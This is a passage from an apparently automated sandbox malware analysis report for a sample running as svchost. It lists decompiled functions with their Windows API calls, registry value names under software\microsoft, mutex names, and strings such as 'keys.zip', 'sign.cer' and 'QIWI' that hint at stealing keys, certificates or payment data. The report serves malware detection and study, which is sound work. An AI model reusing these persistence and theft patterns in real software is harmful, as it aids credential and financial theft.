ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02D0903D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: File$HandleMutexObjectReleaseSingleViewWait$CloseCreateDesktopFreeHeapInformationMappingThreadUnmap
String ID:
API String ID: 2125184990-0
Opcode ID: 284697e1ad76a5116839e04a7006aa61981aeb641a8806dfa8bfef5512f964f5
Instruction ID: c847cf4eb79bee362e1b5fe67b1d31a8b59223cfbcf28f88aa45841204a8340a
Opcode Fuzzy Hash: 284697e1ad76a5116839e04a7006aa61981aeb641a8806dfa8bfef5512f964f5
Instruction Fuzzy Hash: A741AF79A80354ABD710DF74EC99FA637A9AB49720F144E05FA11973D1C7F1AC20CBA0

Function 02D0F120 Relevance: 16.5, APIs: 13, Instructions: 218memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,-05A9F5C8,00000000,00000000,?,?,?,?), ref: 02D0F164
HeapAlloc.KERNEL32(00000000), ref: 02D0F16B
memset.MSVCRT ref: 02D0F17B
memcpy.MSVCRT ref: 02D0F186
GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,02D4573C,?,02D45CF4,-05A9F5C8,00000000,00000000,?), ref: 02D0F24E
HeapValidate.KERNEL32(00000000), ref: 02D0F255
GetProcessHeap.KERNEL32(?,00000000), ref: 02D0F261
HeapFree.KERNEL32(00000000), ref: 02D0F268
memcpy.MSVCRT ref: 02D0F28E
GetProcessHeap.KERNEL32(00000000,00000000,-05A9F5C8,00000000,00000000,?,?,?,?), ref: 02D0F2BA
HeapValidate.KERNEL32(00000000), ref: 02D0F2BD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D0F2CA
HeapFree.KERNEL32(00000000), ref: 02D0F2CD

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidatememcpy$Allocmemset
String ID:
API String ID: 1948005343-0
Opcode ID: 3abbc0e603715ce542d371a51ec482d4817926d44cd81506f87cb13a4b99a226
Instruction ID: 86314abf31f812ee39b24f27d7d313236d89567c064e39c3e94e66169b281480
Opcode Fuzzy Hash: 3abbc0e603715ce542d371a51ec482d4817926d44cd81506f87cb13a4b99a226
Instruction Fuzzy Hash: E661B476A002099FDB20CF68D8C4BAAB7A9EF89324F148255ED04D7390DB30DD51CBE1

Function 02D14330 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 125registrymemoryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D1433A
memset.MSVCRT ref: 02D14370
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02D14397
RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02D143BA
GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02D1442D
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02D14434
memset.MSVCRT ref: 02D14444
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 02D14472

Strings

software\microsoft, xrefs: 02D1438D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heapmemset$AdminAllocCloseOpenProcessQueryUserValue
String ID: software\microsoft
API String ID: 1484339481-3673152959
Opcode ID: 715aa294a3f4d6e200254bd27b5953b5a9604ab11a8fc1f194efb979eaf70d24
Instruction ID: abf01ee21a09f09fc78be62b7e06082e985f3c13715f31f1bf9afcdc20a5fcd0
Opcode Fuzzy Hash: 715aa294a3f4d6e200254bd27b5953b5a9604ab11a8fc1f194efb979eaf70d24
Instruction Fuzzy Hash: 2D41F776900259BBDB21CF65A809FDABBF8DF85B04F154194ED84A7700DB709E09CBA1

Function 02D07880 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 124registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D078B3
memset.MSVCRT ref: 02D078CB
RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?,?,?,?,?,?,7591F380), ref: 02D078EC
RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104,?,?,?,?,?,7591F380), ref: 02D07912
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,7591F380), ref: 02D0799D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,7591F380), ref: 02D079A4
memset.MSVCRT ref: 02D079B3
RegCloseKey.ADVAPI32(?,?,?,?,?,?,7591F380), ref: 02D079E3

Strings

software\microsoft, xrefs: 02D078E0

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: memset$Heap$AllocCloseOpenProcessQueryValue
String ID: software\microsoft
API String ID: 4158279268-3673152959
Opcode ID: 3b20fe82d95ba8fdb9fa64b67956b3489cc478f900eccbfcb2b95cfab1364e7a
Instruction ID: b437b2240a13c3924799f35fab7f5b796ec12f7015f748d4c58b7a8c411f31ba
Opcode Fuzzy Hash: 3b20fe82d95ba8fdb9fa64b67956b3489cc478f900eccbfcb2b95cfab1364e7a
Instruction Fuzzy Hash: AE412671D0015D6FEB10DB64ACC8BEAB7A9EB5D304F4045A8E545D7390D770AE898BA0

Function 02D23EB8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 118synchronizationsleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(02D5D19C), ref: 02D23ED7
PathAddBackslashA.SHLWAPI(02D5D19C,?,?), ref: 02D23F69
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 02D23FF5
Sleep.KERNEL32(000003E8), ref: 02D24006
ReleaseMutex.KERNEL32(00000000), ref: 02D2400D

Part of subcall function 02D25580: GetHandleInformation.KERNEL32(00000000,00000000,?,?,02D25295,02D213E0,00000000), ref: 02D25594
Part of subcall function 02D25580: CloseHandle.KERNEL32(00000000,?,?,02D25295,02D213E0,00000000), ref: 02D255A5

Strings

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}, xrefs: 02D23FEC
path.txt, xrefs: 02D23FAD
keys.zip, xrefs: 02D23F1B
\t, xrefs: 02D23ED7, 02D23F69

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: BackslashHandleMutexPath$CloseCreateInformationReleaseSleep
String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys.zip$path.txt$\t
API String ID: 3621236684-1798795610
Opcode ID: 93fea3b3030c03b037a1aec53274bb89416c00453a45679be5ff2be2edd1d434
Instruction ID: 0858b4feda3a6d1e821f3bea6e49b36214d2e96252d3d901bf76eedd9f7a828f
Opcode Fuzzy Hash: 93fea3b3030c03b037a1aec53274bb89416c00453a45679be5ff2be2edd1d434
Instruction Fuzzy Hash: 51410B349446AA4FCB16CF28A439BE67BE2AF5A304F148AD5D889C7340DB719D4CC790

Function 02D07BA0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D07BC2
memset.MSVCRT ref: 02D07BE0
RegOpenKeyExA.ADVAPI32(02D15889,software\microsoft,00000000,00000102,80000002,?,?,?,?,00000000,0000000A), ref: 02D07C7D
RegSetValueExA.ADVAPI32(80000002,a3b7f923a,00000000,00000001,?,00000104,?,?,?,?,00000000,0000000A), ref: 02D07C9F
RegDeleteValueA.ADVAPI32(80000002,a3b7f923a,?,?,?,?,00000000,0000000A), ref: 02D07CAC
RegFlushKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02D07CBA
RegCloseKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02D07CCF

Strings

software\microsoft, xrefs: 02D07C77
a3b7f923a, xrefs: 02D07C9D, 02D07CAA

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Valuememset$CloseDeleteFlushOpen
String ID: a3b7f923a$software\microsoft
API String ID: 3377232977-2470167804
Opcode ID: f9c2fd75dc4d481ca44c1aba07cf77e24baab220943a137e81e74a8668323570
Instruction ID: 829ff9e4a244d83d9feade625dc9e8422f05dd51e09a70bae92c9c8ae4155bae
Opcode Fuzzy Hash: f9c2fd75dc4d481ca44c1aba07cf77e24baab220943a137e81e74a8668323570
Instruction Fuzzy Hash: B731EB75940158ABFB10DB7498C8BEEB7A9EB15304F5045ACE585DB390D670AE84CF90

Function 02D1F098 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 89filesynchronizationsleepCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(02D5DCB0,02D5DBA8,00000000), ref: 02D1F0D9
CopyFileA.KERNEL32(02D5DCB0,02D5DBA8,00000000), ref: 02D1F153
CreateMutexA.KERNEL32(00000000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02D1F15E
Sleep.KERNEL32(000003E8), ref: 02D1F16F
ReleaseMutex.KERNEL32(00000000), ref: 02D1F176
GetHandleInformation.KERNEL32(00000000,?), ref: 02D1F188
CloseHandle.KERNEL32(00000000), ref: 02D1F199

Strings

sign.cer, xrefs: 02D1F0FE
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}, xrefs: 02D1F155

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CopyFileHandleMutex$CloseCreateInformationReleaseSleep
String ID: Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$sign.cer
API String ID: 2434762175-3941987283
Opcode ID: 956a01130724935f81547a8c4a3f3c98e7c106dac393c1758a2aaca7d857829e
Instruction ID: c268c8349097c29aede9d4ebad1d8a97764807494bf649040821f51ee7e9a759
Opcode Fuzzy Hash: 956a01130724935f81547a8c4a3f3c98e7c106dac393c1758a2aaca7d857829e
Instruction Fuzzy Hash: 3731D7389847946FE7125F24B868B667FE1AF16744F698084ECC98BB12D770CC45C7A1

Function 02D19B00 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D19B08
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02D19CC7), ref: 02D19B3F
RegQueryValueExA.ADVAPI32(02D19CC7,a3b7fa02a,00000000,?,00000000,?), ref: 02D19B5C
RegCloseKey.ADVAPI32(02D19CC7), ref: 02D19B66
RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02D19B99
RegQueryValueExA.ADVAPI32(?,a3b7fa02a,00000000,?,00000000,?), ref: 02D19BB6
RegCloseKey.ADVAPI32(?), ref: 02D19BC0

Strings

a3b7fa02a, xrefs: 02D19B56, 02D19BB0
software\microsoft, xrefs: 02D19B28, 02D19B82

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue$AdminUser
String ID: a3b7fa02a$software\microsoft
API String ID: 2113243795-649089720
Opcode ID: a39ebeefa9a9c164e5d33346d4daaf29f5729a44f739671b010fc06f7c46d19e
Instruction ID: e23ca0e4db364fdeaf76af5331e563d08aaa461a6f8c6c90bec0afd45687b0dc
Opcode Fuzzy Hash: a39ebeefa9a9c164e5d33346d4daaf29f5729a44f739671b010fc06f7c46d19e
Instruction Fuzzy Hash: FC213279E40219FBEB10DFA4EC95FEEBBB8EB58704F504599F501A6240D7B06E04CB90

Function 02D03600 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D03608
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02D15686), ref: 02D0363F
RegQueryValueExA.ADVAPI32(02D15686,a3b7fb90a,00000000,?,00000000,?), ref: 02D0365C
RegCloseKey.ADVAPI32(02D15686), ref: 02D03666
RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02D03699
RegQueryValueExA.ADVAPI32(?,a3b7fb90a,00000000,?,00000000,?), ref: 02D036B6
RegCloseKey.ADVAPI32(?), ref: 02D036C0

Strings

a3b7fb90a, xrefs: 02D03656, 02D036B0
software\microsoft, xrefs: 02D03628, 02D03682

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue$AdminUser
String ID: a3b7fb90a$software\microsoft
API String ID: 2113243795-452601912
Opcode ID: c833935fb91b8ed6dafbc2e009363dfc2bc903d67fd1f286ebf37bd7e29bc5ab
Instruction ID: 9daee47cac559aed296f8acedbdd70611b726f1f7c9c8f4ac8462d58cb195b33
Opcode Fuzzy Hash: c833935fb91b8ed6dafbc2e009363dfc2bc903d67fd1f286ebf37bd7e29bc5ab
Instruction Fuzzy Hash: 31212479E40219FBEB10DFA4DC85FEEB7B8EF58704F504559F501A6280D7B46A44CB90

Function 02D21AE0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 40sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,02D21990,00000000,00000000,00000000), ref: 02D21AF4
Sleep.KERNEL32(00009C40), ref: 02D21B05
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D21B0E
GetHandleInformation.KERNEL32(00000000,?), ref: 02D21B20
CloseHandle.KERNEL32(00000000), ref: 02D21B31
PathAddBackslashA.SHLWAPI(5C590608), ref: 02D21B3C

Strings

QIWI, xrefs: 02D21B42
\t, xrefs: 02D21B3C
5C590608, xrefs: 02D21B37, 02D21B47

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$BackslashCloseCreateInformationObjectPathSingleSleepThreadWait
String ID: 5C590608$QIWI$\t
API String ID: 197911262-3092872722
Opcode ID: 34e54feb6cb236179aef514be7c81fdbfcc115045a75175cbfe2b376d336fbcd
Instruction ID: 113488b80a3c16894e5b67d232758e25493174f862a50f0d031dc7d9dc340589
Opcode Fuzzy Hash: 34e54feb6cb236179aef514be7c81fdbfcc115045a75175cbfe2b376d336fbcd
Instruction Fuzzy Hash: FBF0C235AC5324B7F7209BA4BC0EF6A37E89B16B59F204641F909A53C0DAE09D2486A1

Function 02D0F950 Relevance: 15.3, APIs: 7, Strings: 3, Instructions: 271COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 02D0FA2A
memcpy.MSVCRT ref: 02D0FADA
_snprintf.MSVCRT ref: 02D0FAF6
memcpy.MSVCRT ref: 02D0FB05
memcpy.MSVCRT ref: 02D0FB5C
memcpy.MSVCRT ref: 02D0FB7D
memcpy.MSVCRT ref: 02D0FBFF

Strings

0, xrefs: 02D0FB0A
Content-Length, xrefs: 02D0FB43
%x, xrefs: 02D0FAEE

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: memcpy$_snprintf
String ID: 0$%x$Content-Length
API String ID: 4125937431-3838797520
Opcode ID: 4bcd64099c38754b5a73ad97316702029716eb3aaca88d5469340e42f1ca76bc
Instruction ID: a42b72ec75270779993d312587d9d3877ef0e586c7961f17790e3f2809b81dc6
Opcode Fuzzy Hash: 4bcd64099c38754b5a73ad97316702029716eb3aaca88d5469340e42f1ca76bc
Instruction Fuzzy Hash: C49182B5604706AFC714DF68D8D0A6BB3E9FF88314B148A19E85987B90DB30EC15CFA1

Function 02D292D0 Relevance: 15.1, APIs: 10, Instructions: 97memoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00004070,?,00000000,74E1A250,?,02D138A8,?), ref: 02D292E3
HeapAlloc.KERNEL32(00000000,?,02D138A8,?), ref: 02D292E6
memset.MSVCRT ref: 02D292FB
CreateFileA.KERNEL32(02D138A8,40000000,00000003,00000000,00000002,00000080,00000000,?,02D138A8,?), ref: 02D29352
GetProcessHeap.KERNEL32(00000000,00000000,?,02D138A8,?), ref: 02D29375
HeapValidate.KERNEL32(00000000,?,02D138A8,?), ref: 02D29378
GetProcessHeap.KERNEL32(00000000,00000000,?,02D138A8,?), ref: 02D29384
HeapFree.KERNEL32(00000000,?,02D138A8,?), ref: 02D29387
GetProcessHeap.KERNEL32(00000008,00000010,?,02D138A8,?), ref: 02D2939A
HeapAlloc.KERNEL32(00000000,?,02D138A8,?), ref: 02D2939D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$CreateFileFreeValidatememset
String ID:
API String ID: 604365451-0
Opcode ID: 538dab6882f21be58f4ed2b511e987459e20883afd3f58ac36fe51ca15fc15f2
Instruction ID: d1cdab7c92b0b478231054a4e72ef59dd30315abd50b57e36a5e5fd0e0233880
Opcode Fuzzy Hash: 538dab6882f21be58f4ed2b511e987459e20883afd3f58ac36fe51ca15fc15f2
Instruction Fuzzy Hash: 54318FB19017109FD7309F669998B47FBE8FB65718F50893EE2C997780C370A844CB54

Function 02D0B600 Relevance: 15.1, APIs: 10, Instructions: 81synchronizationwindowthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D0B623
ReleaseMutex.KERNEL32(00000000), ref: 02D0B650
IsWindow.USER32(?), ref: 02D0B657
SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02D0B669
GetCurrentThreadId.KERNEL32 ref: 02D0B678
GetWindowThreadProcessId.USER32(?,00000000), ref: 02D0B682
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D0B694
ReleaseMutex.KERNEL32(00000000), ref: 02D0B6C1
IsWindow.USER32(?), ref: 02D0B6C8
SendMessageA.USER32(?,00000215,00000000,?), ref: 02D0B6DB

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
String ID:
API String ID: 2596333622-0
Opcode ID: 9a62767a72ce33cfc61890bef369d94b2ff858d93fadb22f2bf3342e8dc091be
Instruction ID: 7913844211fa22d6faeb30eebad09eb8f290f4c261df14507d52d53a9df1e4b6
Opcode Fuzzy Hash: 9a62767a72ce33cfc61890bef369d94b2ff858d93fadb22f2bf3342e8dc091be
Instruction Fuzzy Hash: D021E535A80250AFC3118F95F84CEA6B7E8EF59735B444966F505CB3A0C7B05C61CFA0

Function 02D141E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D14214
RegOpenKeyExA.ADVAPI32(00000104,software\microsoft,00000000,00000101,80000002,?,76EDC3F0,00000000), ref: 02D14237
RegQueryValueExA.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,?,76EDC3F0,00000000), ref: 02D1425A
GetProcessHeap.KERNEL32(00000008,00000015,?,76EDC3F0,00000000), ref: 02D142CD
HeapAlloc.KERNEL32(00000000,?,76EDC3F0,00000000), ref: 02D142D4
memset.MSVCRT ref: 02D142E4
RegCloseKey.ADVAPI32(80000002,?,76EDC3F0,00000000), ref: 02D14312

Strings

software\microsoft, xrefs: 02D14231

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heapmemset$AllocCloseOpenProcessQueryValue
String ID: software\microsoft
API String ID: 4043890984-3673152959
Opcode ID: 3a8eefbd6cedb6aa324ad23c0ac55abf876108e7c551b772266d2b417b2ce089
Instruction ID: 4536d36138f7c9f54ed4e6159a6bdf315eb9378eb33d4fb0cbba937d6fb90257
Opcode Fuzzy Hash: 3a8eefbd6cedb6aa324ad23c0ac55abf876108e7c551b772266d2b417b2ce089
Instruction Fuzzy Hash: 7D311975D00219BBCB25CE64A848FDB7BF8AF85704F148294ED54A7700D7709E49CBE0

Function 02D19BE0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D19BE7
GetTickCount.KERNEL32 ref: 02D19BF9
RegOpenKeyExA.ADVAPI32(-80000001,software\microsoft,00000000,00000102,02D19E3F,?,02D19E3F), ref: 02D19C13
RegSetValueExA.ADVAPI32(02D19E3F,a3b7fa02a,00000000,00000004,00000004,00000004,02D19E3F), ref: 02D19C30
RegFlushKey.ADVAPI32(?), ref: 02D19C3A
RegCloseKey.ADVAPI32(?), ref: 02D19C44

Strings

a3b7fa02a, xrefs: 02D19C2A
software\microsoft, xrefs: 02D19C0D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: AdminCloseCountFlushOpenTickUserValue
String ID: a3b7fa02a$software\microsoft
API String ID: 287100044-649089720
Opcode ID: 690e1ff0c6c40883af79bbee4d4214e52f2859623cfd133755ae54fe9f8eb554
Instruction ID: 725d75bd013a3798c3e5b9120593888235901d53df825f800820d833bbd4e382
Opcode Fuzzy Hash: 690e1ff0c6c40883af79bbee4d4214e52f2859623cfd133755ae54fe9f8eb554
Instruction Fuzzy Hash: 95F0317DD80218FBD7109FA0FC49F9E77B8AB18705F504544FE02A2340D6706E148AE1

Function 02D133A0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D133A7
GetTickCount.KERNEL32 ref: 02D133B9
RegOpenKeyExA.ADVAPI32(-80000001,software\microsoft,00000000,00000102,02D1581A,?,02D1581A), ref: 02D133D3
RegSetValueExA.ADVAPI32(02D1581A,A3B7FA4Aa,00000000,00000004,00000004,00000004,02D1581A), ref: 02D133F0
RegFlushKey.ADVAPI32(?), ref: 02D133FA
RegCloseKey.ADVAPI32(?), ref: 02D13404

Strings

software\microsoft, xrefs: 02D133CD
A3B7FA4Aa, xrefs: 02D133EA

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: AdminCloseCountFlushOpenTickUserValue
String ID: A3B7FA4Aa$software\microsoft
API String ID: 287100044-1822152813
Opcode ID: 3b628686d0157e9f5c21ed0029a95d3789aeb333a9ad1fc0b3fe1a126bab02ed
Instruction ID: e6522d266f08408013fd1799ad092c99076c1a4ae913415f90bb18d34f2a6cf6
Opcode Fuzzy Hash: 3b628686d0157e9f5c21ed0029a95d3789aeb333a9ad1fc0b3fe1a126bab02ed
Instruction Fuzzy Hash: 09F0447DD80218FBE7109FA0FC49F9D77B8EB18705F504544FE02A2340DA706E1586E5

Function 02D036E0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D036E7
GetTickCount.KERNEL32 ref: 02D036F9
RegOpenKeyExA.ADVAPI32(-80000001,software\microsoft,00000000,00000102,?), ref: 02D03713
RegSetValueExA.ADVAPI32(?,a3b7fb90a,00000000,00000004,?,00000004), ref: 02D03730
RegFlushKey.ADVAPI32(?), ref: 02D0373A
RegCloseKey.ADVAPI32(?), ref: 02D03744

Strings

a3b7fb90a, xrefs: 02D0372A
software\microsoft, xrefs: 02D0370D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: AdminCloseCountFlushOpenTickUserValue
String ID: a3b7fb90a$software\microsoft
API String ID: 287100044-452601912
